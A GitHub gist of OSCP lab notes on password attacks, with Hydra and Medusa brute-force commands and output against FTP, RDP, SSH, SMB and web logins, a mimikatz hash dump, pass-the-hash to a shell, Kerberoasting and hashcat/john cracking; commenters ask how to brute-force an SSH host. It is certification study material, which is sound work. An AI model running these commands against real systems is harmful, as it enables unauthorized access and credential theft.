Skip to content

Instantly share code, notes, and snippets.

@ssstonebraker

ssstonebraker/OSCP_Password_Cracking.md

Last active September 2, 2024 21:34
Show Gist options
  • Save ssstonebraker/180701f0fb9a20edfcae68c38c6c9de1 to your computer and use it in GitHub Desktop.
Save ssstonebraker/180701f0fb9a20edfcae68c38c6c9de1 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
OSCP_Password_Cracking.md

Hydra

Supported protocols

List1 list2 list3 list4 list5
asterisk icq oracle-listener rexec snmp
cisco imap[s] oracle-sid rlogin socks5
cisco-enable irc pcanywhere rpcap ssh
cvs ldap2[s] pcnfs rsh sshkey
firebird ldap3[-{cram digest}md5][s] rtsp
ftp[s] memcached pop3[s] s7-300 teamspeak
http[s]-{head get post} mongodb postgres
http[s]-{get post}-form mssql radmin2 smb
http-proxy mysql rdp smtp[s] vnc
http-proxy-urlenum nntp redis smtp-enum

VNC Attack with Hydra

hydra -s 5900 -P /usr/share/wordlists/rockyou.txt -t 4 10.11.1.73 vnc -V

FTP Attack with Hydra

$ hydra -I -t 10 -l bob -P ftp.txt -vV 192.168.119.152 ftp
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-10 16:28:34
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 17 login tries (l:1/p:17), ~2 tries per task
[DATA] attacking ftp://192.168.119.152:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "January" - 1 of 17 [child 0] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "February" - 2 of 17 [child 1] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "March" - 3 of 17 [child 2] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "April" - 4 of 17 [child 3] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "May" - 5 of 17 [child 4] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "June" - 6 of 17 [child 5] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "July" - 7 of 17 [child 6] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "August" - 8 of 17 [child 7] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "September" - 9 of 17 [child 8] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "October" - 10 of 17 [child 9] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "November" - 11 of 17 [child 6] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "December" - 12 of 17 [child 5] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "lab" - 13 of 17 [child 8] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "Offsec!" - 14 of 17 [child 3] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "offsec!" - 15 of 17 [child 2] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "lab" - 16 of 17 [child 9] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "bob" - 17 of 17 [child 4] (0/0)
[STATUS] attack finished for 192.168.119.152 (waiting for children to complete tests)
[21][ftp] host: 192.168.119.152   login: bob   password: bob

HTTP Form Post with Hydra

hydra 192.168.152.10 http-form-post \
"/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" \
-l admin -P /usr/share/wordlists/rockyou.txt -vV -f

image

RDP Brute Force with Hydra

hydra -u -L users.txt -P pw.txt 10.11.1.20 ldap2 -t 1

[kali@kali:~/lab/19_password_cracking]$ hydra -t1 -V -f -l admin -P rdp.txt rdp://192.168.152.10
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-10 15:51:20
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 1 task per 1 server, overall 1 task, 15 login tries (l:1/p:15), ~15 tries per task
[DATA] attacking rdp://192.168.152.10:3389/
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "January" - 1 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "February" - 2 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "March" - 3 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "April" - 4 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "May" - 5 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "June" - 6 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "July" - 7 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "August" - 8 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "September" - 9 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "October" - 10 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "November" - 11 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "December" - 12 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "lab" - 13 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "Offsec!" - 14 of 15 [child 0] (0/0)
[3389][rdp] host: 192.168.152.10   login: admin   password: Offsec!
[STATUS] attack finished for 192.168.152.10 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-10 15:51:24

SSH Bruteforce with Hydra

[kali@kali:~/lab/19_password_cracking]$ hydra -l student -P ssh.txt ssh://192.168.152.44
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-10 15:52:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:1/p:16), ~1 try per task
[DATA] attacking ssh://192.168.152.44:22/
[22][ssh] host: 192.168.152.44   login: student   password: lab
[22][ssh] host: 192.168.152.44   login: student   password: lab
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-10 15:52:58

[kali@kali:~/lab/19_password_cracking]$

Medusa

This is a speedy, parallel, modular, login bruter forcer.

Supported Modules:

$ medusa -d
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

  Available modules in "." :

  Available modules in "/usr/lib/x86_64-linux-gnu/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 2.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
    + http.mod : Brute force module for HTTP : version 2.1
    + imap.mod : Brute force module for IMAP sessions : version 2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
    + mysql.mod : Brute force module for MySQL sessions : version 2.0
    + nntp.mod : Brute force module for NNTP sessions : version 2.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
    + pop3.mod : Brute force module for POP3 sessions : version 2.0
    + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
    + rexec.mod : Brute force module for REXEC sessions : version 2.0
    + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
    + rsh.mod : Brute force module for RSH sessions : version 2.0
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
    + smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 2.1
    + ssh.mod : Brute force module for SSH v2 sessions : version 2.1
    + svn.mod : Brute force module for Subversion sessions : version 2.1
    + telnet.mod : Brute force module for telnet sessions : version 2.0
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
    + vnc.mod : Brute force module for VNC sessions : version 2.1
    + web-form.mod : Brute force module for web forms : version 2.1
    + wrapper.mod : Generic Wrapper Module : version 2.0

Http Auth Cracking with Medusa

In this example we will be trying to crack the password at http://192.168.152.10/admin which uses .htaccess to protect access to the directory for user "admin"

medusa -h 192.168.152.10 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

The password was found! image

SMB Cracking with Medusa

We will be trying to crack the password for user "offsec" with the word list smb.txt

  medusa -h 192.168.152.10 -u offsec -P smb.txt -M smbnt

image

Wordlists

Use cewl to generate wordlists from websites

cewl https://brakertech.com -m 6 -w brakertech-cewl.txt

Generate Permutations on custom wordlists with john the ripper

Add custom rule to List.Rules:Wordlist

Let's add two custom rules. The first will append a digit 0-9 to the end of each word, the second will append a double digit to the end of each word.

# append to the end of the [List.Rules:Wordlist] section of /etc/john/john.conf
# Add one number to the end of each pasword
$[0-9]
# Add two numbers to the end of each pasword
$[0-9]$[0-9] 

[kali@kali:~/lab/19_password_cracking]$ grep -A 1 "end of each" /etc/john/john.conf
# Add one number to the end of each pasword
$[0-9]
# Add two numbers to the end of each pasword
$[0-9]$[0-9]

Wordlist Permutation Generation

Mutate cewl list

john --wordlist=brakertech-cewl.txt --rules --stdout > mutated.txt

Mutate a list of Months

Months text file:

[kali@kali:~/lab/19_password_cracking]$ cat months.txt
January
February
March
April
May
June
July
August
September
October
November
December

Mutate it:

john --wordlist=months.txt --rules --stdout > months-mutated.txt; cat months-mutated.txt | sort | uniq > months-mutated-uniq.txt

List the number of lines:

[kali@kali:~/lab/19_password_cracking]$ cat months-mutated-uniq.txt | wc -l
1799

Wordlist Generation Based on Pattern

crunch

Assume the following pattern:

[Capital Letter] [2 x lower case letters] [2 x special chars] [3 x numeric]

image

To generate a wordlist that matches our requirements, we will specify a minimum and maximum word length of eight characters (8 8) and describe our rule pattern with:

crunch 8 8 -t ,@@^^%%%

Crunch Character Sets

Crunch character sets can be found at:

/usr/share/crunch/charset.lst

To generate a list of words between 4-6 characters that is a mix of upper and lower case:

kali@kali:~$ crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt Crunch will now generate the following amount of data: 140712049920 bytes 134193 MB
131 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 20158125312

Pass the Hash

You can use the hash of the NTLM account to authenticate to systems

Mimikatz - Dumping the Hashes

C:\Tools\password_attacks>mimikatz.exe

  .#####.   mimikatz 2.1.1 (x86) built on Mar 25 2018 21:00:57
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

528     {0;000003e7} 1 D 29162          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;000f3d23} 3 D 1256857     CLIENT251\Administrator S-1-5-21-1375711201-1277040102-1320212398-500
(14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 1309568     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : CLIENT251
SysKey : 34d76d5474939d8e4eff07823e7691d1
Local SID : S-1-5-21-1375711201-1277040102-1320212398

SAMKey : 0dd784cbffd297eef0b42b099eefe68f

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: 32251211a407adf98000769dc64e3323

RID  : 000003e9 (1001)
User : admin
  Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
    lm  - 0: 30d17563f7974c31af287e692700eb2f
    lm  - 1: b561d600bb224c9ad172dfc2a05c9457
    ntlm- 0: 2892d26cdf84d7a70e2eb3b9f05c425e
    ntlm- 1: f5e4cc1e05fcef8d9e751195562308d9
    ntlm- 2: 2892d26cdf84d7a70e2eb3b9f05c425e

RID  : 000003ea (1002)
User : student
  Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
    lm  - 0: 782f5478a22d80fe0d941f7c53d6beca
    ntlm- 0: 2892d26cdf84d7a70e2eb3b9f05c425e
    ntlm- 1: 2892d26cdf84d7a70e2eb3b9f05c425e

RID  : 000003eb (1003)
User : offsec
  Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
    lm  - 0: 61fc5cc76eab45fcf27f8b0c01386132
    ntlm- 0: 2892d26cdf84d7a70e2eb3b9f05c425e

mimikatz #

Using the hashes

Use pth-winexe to autheticate to the target machine

Syntax

pth-winexe -U username%ntlm1:ntlm2  //ip_address cmd
pth-winexe -U username%ntlm0:ntlm2 //ip_address cmd

Example

kali@kali:~/lab/19.4.3_PasswordCracking]$ cat hash.txt
admin:2892d26cdf84d7a70e2eb3b9f05c425e
WDAGUtilityAccount:32251211a407adf98000769dc64e3323

[kali@kali:~]$ pth-winexe -U admin%2892d26cdf84d7a70e2eb3b9f05c425e:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.152.10 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.16299.15]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Linux Passwords - Unshadow

In order to crack Linxu passwords you need to use the unshadow utility

unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
unshadow passwd shadow > unshadow

Unshadowed

john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
hashcat -m 1800 -a 0 mailman.txt /Passwords/wordlists/* --outfile mailmain.recovered

John the Ripper

Hashes to crack

Kerberos dump hashes

 python3 /pentest/exploitation/impacket/examples/GetUserSPNs.py -request -dc-ip 10.11.1.20 svcorp.com/evan

Kerberos Crack hashes

hashcat -a 0 -m 13100 svcorp-kerb.txt /Passwords/wordlists/rockyou.txt

NTLM

$ cat hash.txt
admin:2892d26cdf84d7a70e2eb3b9f05c425e
WDAGUtilityAccount:32251211a407adf98000769dc64e3323

Pure brute force

$ sudo john hash.txt --format=NT

Using Words Lists

NTLM

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT

Unshadowed

john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Unshadowed md5crypt

Exmaple hash

bob:$1$2Wf/hKQd$tV9MM3Qd0Y88GvsDfVvHL0:500:500::/home/bob:/bin/bash

Hashcat

hashcat -m 500 -a 0 tophat.txt /Passwords/wordlists/rockyou.txt

Word Lists with Mangle

john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT

Kerberos Tickets

Convert to john format (output file will be crack_file)

python kirbi2john.py /home/kali/ktickets/[email protected]~1433.kirbi

Crack

# john crack_file --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

Hashcat

NTLM Hash Cracking

Source File

Administrator:500:aad3b435b51404eeaad3b435b51404ee:a8c8b7a37513b7eb9308952b814b522b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:05fa67eaec4d789ec4bd52f48e5a6b28:2733cdb0d8a1fec3f976f3b8ad1deeef:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0f7a50dd4b95cec4c1dea566f820f4e7:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:b74242f37e47371aff835a6ebcac4ffe:::
kali:1007:aad3b435b51404eeaad3b435b51404ee:fe0bd4e2285afa2676815126dee2f671:::

Hashcat Command NTLM

 hashcat --force -m 1000 ntlm.txt /Passwords/wordlists/rockyou.txt
 
 hashcat --force -m 1000 -r /usr/share/hashcat/rules/best64.rule ntlm.txt /Passwords/wordlists/rockyou.txt --outfile alice.recovered

Show username with outfile

hashcat --username --show -m 1000 -a 0 disco.txt /Passwords/wordlists/rockyou.txt --outfile disco.recovered
kali:fe0bd4e2285afa2676815126dee2f671:kalikali
Guest:31d6cfe0d16ae931b73c59d7e0c089c0:
tood:9a82672679eba04f060863e3dcff7ec7:SPRINGFIELD
mark:bcd477bfdb45435a34c6a38403ca4364:1985
lisa:9c1a294eacb2256b85d8aaba29cfa8f8:BART
ned:40506e34f25e9a8e63ebb95a71afa46a:FLANDERS
david:1fbff38cae51e9918da1fec572f03e11:012345
lee:fc12c395f8f4f7b164b874b9a295f18e:CHEESE
alice:37bcb18eea49b1c09efcfdd9909fcb3a:QWERTY
john:c420ab2599dff2c51e5086c05feb710b:PASSWORD1
homer:8ca881aabea06ef2406acfe38e841b1a:HOMER1

Result File

root@crackstation:/labs/alice]# cat alice.recovered
31d6cfe0d16ae931b73c59d7e0c089c0:
fe0bd4e2285afa2676815126dee2f671:kalikali
b74242f37e47371aff835a6ebcac4ffe:aliceishere

Convert john kerberos format to hashcat

sed -i 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file

Crack Kerberos with Hashcat Wordslists

hashcat -m 13100 -a 0 crack_file /opt/wordlists/Passwords/*.txt

Masks

Using just the masks - Kerberos

hashcat -m 13100 -a 3 crack_file /opt/hashcat-5.1.0/masks/rockyou-1-60.hcmask

Incrementing the masks

Use the --increment flag

# kerberos shown
hashcat -m 13100 -a 3 --increment crack_file /opt/hashcat-5.1.0/masks/8char-1l-1u-1d-1s-compliant.hcmask
@officialstar
Copy link

officialstar commented Feb 21, 2022
edited
Loading

how do i crack the username & password for a known SSH ip -using HASHCAT bruteforce method,without creating wordlist etc.wht is the exact command ,tht works perfectly

@ssstonebraker
Copy link
Author

Hashcat is used to crack hashes. You are talking about brute forcing an IP addressing that is running sshd (presumably). Cracking a username/password for sshd may not be possible if the host system only accepts a public/private keypair. That being said if you wanted to try anyway something like medusa would be advisable.

@officialstar
Copy link

thankful fr reply..i want something like the the charset which is inbuilt in hashcat fr bruteforce to use it in hydra without creating a wordlist etc,in other words i want to bruteforce the username & passwords without creating a wordlist something tht happens in hashcat -a 3..i hope u gt me

@ssstonebraker
Copy link
Author

ssstonebraker commented Feb 23, 2022 via email

@officialstar
Copy link

thank u very much..will go thru tht..bt some hw if u gt to get the command plz let me nw...using hashcat

@officialstar
Copy link

with u r help just found this command hydra -t 128 -l user_name -V -x '4:4:aA1"@#$!()=`~?><;:%^&*_-+/,.\ ' localhost ssh..working on it

@officialstar
Copy link

i just found a bruteforce command on stackexchange fourm on HYDRA "hydra -t 128 -l user_name -V -x '4:4:aA1"@#$!()=`~?><;:%^&*_-+/,.\ ' localhost ssh"
i want the same thing to be done on hashcat with bruteforce -a 3
if u gt to kw let me nw

@ssstonebraker
Copy link
Author

ssstonebraker commented Feb 23, 2022 via email

@officialstar
Copy link

ok well finally understood hashcat can crack only hashes & nt usernames or passwords..atleast let me nw hw do i apply PIPE on hydra

@officialstar
Copy link

something like this crunch 8 8 123456789| hashcat -m 0 ce5cff0195a6b059a32411b6202ab49

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment